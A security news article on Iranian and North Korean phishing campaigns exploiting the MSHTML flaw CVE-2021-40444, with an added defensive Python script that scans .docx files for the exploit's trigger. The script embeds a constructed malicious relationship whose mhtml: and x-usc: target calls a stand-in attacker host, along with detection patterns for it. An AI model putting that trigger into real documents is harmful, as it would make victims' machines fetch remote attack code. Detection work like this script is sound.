Hackers Exploit MS Browser Engine Flaw Where Unpatched
Majority of Victims in Iranian Campaign Are Located in US, Researchers Say
An Iranian attacker has been targeting users who have failed to patch a remote code execution vulnerability in a Microsoft browser engine to spy on Farsi-speaking victims, say researchers at SafeBreach Labs.
The flaw in MSHTML - the proprietary browser engine behind Internet Explorer on Windows, which Microsoft Office also uses to render web content embedded in documents - has been designated CVE-2021-40444. It was patched in September (see: Microsoft Patches MSHTML Vulnerability).
The threat actors are using a new PowerShell stealer, called PowerShortShell, to carry out the attacks on unpatched systems, according to SafeBreach Labs. The stealer gets its name from its length: just 153 lines of code, the researchers say.
The same vulnerability was also recently exploited by a North Korean attacker, says South Korean security company AhnLab. It says the attacker distributed the malicious files under the pretext of disseminating material about North Korea.
The Iranian campaign, being run by an unknown attacker since September, uses a new PowerShell stealer that has "powerful collection capabilities," says Tomer Bar, director of security research at SafeBreach.
The tool "provides the adversary a lot of critical information, including screen captures, Telegram files, document collection, and extensive data about the victim's environment," Bar says in the SafeBreach blog post.
Although the researchers don't know how many victims the campaign has amassed, Bar says that based on "the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran's Islamic regime."
The firm says the majority of targets appear to be based in the U.S., followed by the Netherlands.
SafeBreach researchers note that the current attack campaign is a three-step process:
- First stage: A phishing mail containing a malicious Word attachment is sent to the victim, who is lured into opening it. The researchers observed two different Word documents - Mozdor[.]docx, which exploits the MSHTML vulnerability, and جنایات خامنه ای[.]docx or Khamenei Crimes[.]docx, which includes links to the Iranian news site Hamshahri Online and a Twitter account belonging to IranWire journalist Aida Ghajar.
- Second stage: The Word file exploits the MSHTML vulnerability, connects to the attacker's server and then drops a malicious DLL into the %temp% directory on the victim's Windows computer.
- Third stage: The malicious DLL executes the PowerShortShell script, which then collects data and exfiltrates it to the attacker's command-and-control server.
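The page describes the first stage only as a Word attachment that "exploits the MSHTML vulnerability." In the publicly documented CVE-2021-40444 delivery technique, the trigger lives in the document's relationship part, word/_rels/document.xml.rels: an oleObject relationship marked TargetMode="External" whose Target uses the mhtml: scheme (handled by MSHTML) with an x-usc: redirection to an attacker-hosted HTML page. The following is an added triage script, not code from SafeBreach, AhnLab or ISMG, that builds two constructed .docx files in memory and flags that relationship pattern; the rels content and the attacker.invalid host are placeholders, not the Mozdor[.]docx sample or any reported infrastructure.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship part that CVE-2021-40444 documents abuse, and the
# relationship type / XML namespace needed to find the entry.
RELS_PATH = "word/_rels/document.xml.rels"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# Constructed relationship parts for the demo (not real samples).
# attacker.invalid is a placeholder host, not reported infrastructure.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="mhtml:http://attacker.invalid/word.html!x-usc:http://attacker.invalid/word.html" TargetMode="External"/>
</Relationships>"""

BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal constructed .docx (a zip) carrying the given rels part.
    Nothing is fetched or rendered; the file only holds the relationship."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


def scan_docx(data: bytes) -> list:
    """Return a list of findings describing CVE-2021-40444-style
    relationships; an empty list means nothing suspicious was seen."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if RELS_PATH not in z.namelist():
            return findings          # no document rels part: nothing to check
        root = ET.fromstring(z.read(RELS_PATH))
    for rel in root.iter("{%s}Relationship" % RELS_NS):
        target = rel.get("Target", "")
        lowered = target.lower()
        external = rel.get("TargetMode", "").lower() == "external"
        # Linked (external) OLE objects are rare in ordinary documents.
        if rel.get("Type") == OLE_REL_TYPE and external:
            findings.append("external OLE object target: " + target)
        # mhtml: hands the target to MSHTML, the vulnerable engine.
        if lowered.startswith("mhtml:"):
            findings.append("mhtml: scheme target: " + target)
        # !x-usc: redirects the MHTML handler to a second URL.
        if "!x-usc:" in lowered:
            findings.append("x-usc: redirection in target: " + target)
    return findings


def verdict(data: bytes) -> str:
    """Summarise a scan as 'suspicious' or 'clean'."""
    return "suspicious" if scan_docx(data) else "clean"


if __name__ == "__main__":
    for label, rels in (("constructed malicious", MALICIOUS_RELS),
                        ("constructed benign", BENIGN_RELS)):
        doc = build_docx(rels)
        print(label, "->", verdict(doc), scan_docx(doc))
```

This is a triage heuristic, not a full detector: a linked OLE object with an external target can occur in legitimate documents, so treat a hit as a reason to pull the file for analysis rather than as proof of exploitation, and run it against files as attached (before any sandbox opens them) so the second-stage download never happens on the scanning host.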
The researchers also tie the attackers to a similar phishing campaign in July, which stole victims' Gmail and Instagram credentials.
In that campaign, the attackers used a phishing website at Deltaban[.]dedyn[.]io to masquerade as the real Deltaban travel agency website. The data collected was stored in an out[.]txt file, which was sent to the same C2 server used in the current campaign, the researchers say.
North Korean Version
As with the Iranian campaign, the campaign being run by North Korean attackers is also distributing two Word document files - one that mentions a seminar from the "Korea Institute for National Unification" and another that mentions "cross-border co-operation with Russia, China and North Korea," says AhnLab. The security firm first published details of the campaign on Nov. 22.
"It is noteworthy that the confirmed document files are all North Korea-related materials," AhnLab researchers say. The contents of the Word documents imply that the campaign is directed toward South Koreans, they add.
The modus operandi of these attackers parallels that of the Iranian attackers, in that it follows the same execution steps. But the researchers did not specify whether the intent of this campaign appeared to be data exfiltration.
AhnLab did not respond to Information Security Media Group's request for additional information.
With multiple attackers actively exploiting CVE-2021-40444, firms using Microsoft Office should immediately update their software to the latest version as a prevention measure, say researchers from EST Security, which discovered yet another campaign targeting the vulnerability. In this case, the campaign used communications that attempted to impersonate the president of North Korea's Pyongyang University of Science and Technology.
"The North Korean cyberthreat organization identified as the perpetrator behind this campaign is actively introducing document-based security vulnerabilities such as PDF and DOC files to customized targeted attacks such as CVE-2020-9715 and CVE-2021-40444," the EST Security researchers say. CVE-2020-9715 is a vulnerability that allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. Exploitation requires user interaction: the victim must visit a malicious page or open a malicious file. The flaw lies in the handling of ESObject data objects, where the code fails to validate that an object exists before performing operations on it. An attacker can leverage this to execute code in the context of the current process.